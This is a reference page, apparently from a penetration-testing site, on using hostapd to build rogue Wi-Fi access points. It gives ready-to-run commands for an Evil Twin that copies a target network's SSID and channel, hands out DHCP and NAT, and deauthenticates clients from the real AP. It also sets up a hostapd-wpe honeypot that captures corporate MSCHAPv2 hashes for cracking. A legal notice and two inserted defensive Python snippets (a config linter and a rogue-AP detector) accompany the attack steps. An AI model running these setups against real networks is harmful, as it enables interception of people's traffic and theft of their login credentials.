Hostapd

Linux daemon for creating software-based access points — the backbone of evil twin attacks, rogue AP setups, and WPA Enterprise honeypots in authorized wireless security assessments.

Category: Wireless
Platform: Linux / Kali
Type: CLI / Daemon / Open Source
Skill Level: Intermediate → Advanced

What is Hostapd?

Hostapd (Host Access Point Daemon) is a Linux userspace daemon that turns a wireless network interface into a fully functional IEEE 802.11 access point. It handles all the Wi-Fi management frames — authentication, association, beacon broadcasts — and supports WEP, WPA, WPA2 (Personal and Enterprise), and open networks. In penetration testing it is primarily used to create rogue access points: either an open or WPA-matching Evil Twin AP to lure clients away from a legitimate network, or a WPA Enterprise honeypot to capture enterprise credential hashes.

Hostapd does not provide DHCP or internet routing on its own — it must be paired with dnsmasq (for DHCP/DNS) and iptables NAT rules (for internet access) to create a fully functional rogue AP that clients can actually use. Together, this stack is the foundation of most wireless MITM attack labs.

⚠ Legal Notice

Creating a rogue access point on any network you do not own or have explicit written permission to test is a criminal offense. Unauthorized Evil Twin or rogue AP deployment violates Pakistan's PECA 2016 and international cybercrime laws. Use only in isolated lab environments or authorized wireless assessments.

Installation

# Install hostapd and supporting tools
sudo apt update
sudo apt install hostapd dnsmasq iptables -y

# Check version
hostapd -v

# Verify wireless interface supports AP mode
iw list | grep -A 10 "Supported interface modes" | grep AP

Basic Open Access Point

The simplest setup — an open (no password) access point. All configuration lives in a plain text config file passed to hostapd at runtime.

# Step 1: Create the hostapd configuration file
# (hostapd only treats lines that start with # as comments, so each
#  comment sits on its own line rather than after a value)
cat > /tmp/hostapd_open.conf << EOF
# your wireless interface
interface=wlan0
# standard Linux wireless driver
driver=nl80211
# AP name (SSID)
ssid=FreeWiFi
# 802.11g (2.4 GHz)
hw_mode=g
# Wi-Fi channel
channel=6
# allow all MAC addresses
macaddr_acl=0
# broadcast SSID (visible)
ignore_broadcast_ssid=0
EOF

# Step 2: Start the access point
sudo hostapd /tmp/hostapd_open.conf

# Step 3: Run in background / daemon mode (-P writes the PID file used in Step 4)
sudo hostapd -B -P /var/run/hostapd.pid /tmp/hostapd_open.conf

# Step 4: Stop the daemon
sudo kill "$(cat /var/run/hostapd.pid)"
# or just Ctrl+C if running in foreground

WPA2 Personal Access Point

# WPA2-PSK configuration
cat > /tmp/hostapd_wpa2.conf << EOF
interface=wlan0
driver=nl80211
ssid=TargetNetwork
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Password123
wpa_key_mgmt=WPA-PSK
# wpa_pairwise is the WPA (v1) cipher list; with wpa=2 the pairwise cipher comes from rsn_pairwise
wpa_pairwise=TKIP
rsn_pairwise=CCMP
EOF

sudo hostapd /tmp/hostapd_wpa2.conf
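
hostapd reads its config file line by line and treats only lines that begin with # as comments, so a trailing comment or stray space silently becomes part of a value such as ssid or interface. The linter below is an added example, not part of the original page or of hostapd; it checks that pitfall plus passphrase length and TKIP use, and the sample config and function names are constructed for illustration.

```python
# Added example: lint hostapd.conf text (illustrative helper, not part of hostapd).
import re

def parse_hostapd_conf(text):
    """Parse key=value lines the way hostapd reads them: a line is a comment
    only if '#' is its first character, and everything after '=' is the value."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw or raw.startswith("#"):
            continue
        key, sep, value = raw.partition("=")
        if sep:
            entries.append((lineno, key, value))
    return entries

def lint(text):
    """Return (line, key, finding) tuples; line 0 marks a file-level finding."""
    entries = parse_hostapd_conf(text)
    findings = []
    for lineno, key, value in entries:
        if re.search(r"\s#", value):
            findings.append((lineno, key, "inline comment is read as part of the value"))
        elif value != value.strip():
            findings.append((lineno, key, "stray whitespace is read as part of the value"))
        if key == "ssid" and len(value.encode()) > 32:
            findings.append((lineno, key, "SSID exceeds 32 bytes"))
        if key == "wpa_passphrase" and not 8 <= len(value) <= 63:
            findings.append((lineno, key, "passphrase must be 8 to 63 characters"))
        if key == "rsn_pairwise" and "TKIP" in value.split():
            findings.append((lineno, key, "TKIP offered for WPA2; keep CCMP only"))
    wpa = dict((k, v) for _, k, v in entries).get("wpa", "0").strip()
    if not wpa.startswith(("1", "2", "3")):
        findings.append((0, "wpa", "no WPA configured: the network is open"))
    return findings

# Constructed sample configuration for the demonstration.
SAMPLE = """\
# lab AP
interface=wlan0   # lab adapter
ssid=LabNet
wpa=2
wpa_passphrase=short
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP
"""

if __name__ == "__main__":
    for lineno, key, finding in lint(SAMPLE):
        print(f"line {lineno}: {key}: {finding}")
```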

Evil Twin AP Setup

An Evil Twin AP mimics a legitimate network — same SSID, stronger signal — to de-authenticate clients from the real AP and capture their re-association handshakes or credentials. This requires both hostapd and a deauth mechanism (e.g. aireplay-ng on a separate interface).

# Step 1: Find the target AP's details (SSID, channel, BSSID)
sudo airodump-ng wlan0

# Step 2: Create Evil Twin config matching the target SSID and channel
cat > /tmp/evil_twin.conf << EOF
# second wireless adapter for the AP
interface=wlan1
driver=nl80211
# MUST match the real AP's SSID exactly
ssid=TargetSSID
hw_mode=g
# MUST match the real AP's channel
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
EOF

# Step 3: Start Evil Twin AP
sudo hostapd /tmp/evil_twin.conf &

# Step 4: Add DHCP with dnsmasq so clients get an IP
cat > /tmp/dnsmasq_evil.conf << EOF
interface=wlan1
dhcp-range=192.168.50.10,192.168.50.100,12h
dhcp-option=3,192.168.50.1
dhcp-option=6,192.168.50.1
server=8.8.8.8
EOF

sudo ip addr add 192.168.50.1/24 dev wlan1
sudo dnsmasq -C /tmp/dnsmasq_evil.conf

# Step 5: Enable NAT forwarding (optional — gives clients internet)
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1

# Step 6: Deauth clients from real AP on separate interface (wlan0)
sudo aireplay-ng --deauth 0 -a BSSID_OF_REAL_AP wlan0
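
From the defender's side, the twin described above shows up in scan data as a managed SSID advertised by a BSSID that is not in the AP inventory, often with weaker security than the real network. The check below is an added example, not part of the original page; the inventory, SSIDs, BSSIDs and scan records are constructed, and it assumes scan results have already been collected into records.

```python
# Added example: flag beacons that reuse a managed SSID but do not match
# the AP inventory. Inventory and scan data below are constructed.
from collections import namedtuple

Beacon = namedtuple("Beacon", "ssid bssid channel security")

# Assumed inventory of sanctioned APs: SSID -> {BSSID: (channel, security)}
INVENTORY = {
    "CorpWiFi": {
        "aa:bb:cc:00:00:01": (6, "WPA2-EAP"),
        "aa:bb:cc:00:00:02": (11, "WPA2-EAP"),
    },
}

def assess(beacon, inventory=INVENTORY):
    """Return the reasons a beacon looks like a rogue copy of a managed SSID."""
    aps = inventory.get(beacon.ssid)
    if aps is None:
        return []  # not an SSID we manage
    known = aps.get(beacon.bssid.lower())
    if known is None:
        reasons = ["managed SSID from a BSSID that is not in the inventory"]
        if beacon.security not in {sec for _, sec in aps.values()}:
            reasons.append("security downgraded to " + beacon.security)
        return reasons
    channel, security = known
    reasons = []
    if beacon.channel != channel:
        reasons.append("inventoried BSSID seen on an unexpected channel")
    if beacon.security != security:
        reasons.append("inventoried BSSID advertising " + beacon.security)
    return reasons

def find_rogues(scan, inventory=INVENTORY):
    """Map BSSID -> reasons for every beacon that fails the inventory check."""
    rogues = {}
    for b in scan:
        reasons = assess(b, inventory)
        if reasons:
            rogues.setdefault(b.bssid.lower(), []).extend(reasons)
    return rogues

# Constructed scan results, as a monitoring sensor might report them.
SCAN = [
    Beacon("CorpWiFi", "aa:bb:cc:00:00:01", 6, "WPA2-EAP"),
    Beacon("CorpWiFi", "AA:BB:CC:00:00:02", 11, "WPA2-EAP"),
    Beacon("CorpWiFi", "02:11:22:33:44:55", 11, "OPEN"),
    Beacon("CoffeeShop", "10:20:30:40:50:60", 1, "OPEN"),
]
```

A twin that also clones the BSSID, channel and security settings passes this inventory check, so treat it as one signal among several.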

WPA Enterprise Honeypot (EAP Credential Capture)

Corporate networks often use WPA Enterprise (802.1X / EAP) with usernames and passwords. A rogue WPA Enterprise AP can capture these credentials — typically as MSCHAPv2 hashes — when clients attempt to connect. This requires hostapd-wpe (Wireless Pwnage Edition), a patched version of hostapd.

# Install hostapd-wpe (Kali)
sudo apt install hostapd-wpe -y

# hostapd-wpe includes a default config at:
# /etc/hostapd-wpe/hostapd-wpe.conf

# Edit to match the target corporate SSID
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorporateWiFi
# Set: interface=wlan0
# Set: channel=6

# Start the honeypot
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Captured credentials appear in: /var/log/hostapd-wpe.log
# MSCHAPv2 hashes can be cracked with asleap or hashcat (-m 5500)
cat /var/log/hostapd-wpe.log

Key Configuration Directives

Common CLI Flags

Common Use Cases

Further Reading

Hostapd is rarely used alone — the full Evil Twin stack also involves dnsmasq, iptables, aircrack-ng, and optionally bettercap or mitmproxy for traffic interception. For automated rogue AP frameworks that combine all these tools, look at airgeddon and wifiphisher — both wrap hostapd internally. For WPA Enterprise attacks, study MSCHAPv2 cracking with asleap and hashcat. Practice in isolated lab environments using two wireless adapters on hackzia.site labs.